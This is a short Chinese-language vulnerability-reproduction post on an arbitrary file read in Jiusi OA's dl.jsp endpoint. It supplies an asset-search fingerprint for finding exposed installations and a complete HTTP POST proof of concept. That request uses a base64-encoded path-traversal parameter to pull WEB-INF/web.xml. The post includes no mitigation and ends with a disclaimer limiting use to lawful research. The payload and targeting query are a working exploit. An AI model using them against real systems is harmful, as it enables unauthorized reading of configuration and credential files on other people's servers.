【漏洞复现】|九思OA_dl.jsp任意文件读取

漏洞描述

九思OA产品由北京九思协同软件有限公司（简称九思软件）开发，面向企事业单位和政府机关，致力于提供高端的协同办公解决方案，帮助客户实现信息化、数字化和智能化转型。通过融合多种管理思想与OA接口技术，九思OA帮助企业打破管理边界、整合信息孤岛，形成高效、规范、实时且低成本的管理环境，支持一体化的技术架构。该系统的dl.jsp接口存在任意文件读取漏洞，攻击者可通过该漏洞读取系统的重要文件（如数据库配置文件、系统配置文件等），导致网站安全性严重受损，暴露于更高的攻击风险。

资产概要 

body="/jsoa/login.jsp"

漏洞复现 

POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

免责声明 

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任，均由使用者自行承担，作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC，旨在促进学术研究与技术交流，不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形，请立即与作者联系，作者将尽快采取必要措施予以删除并致以歉意。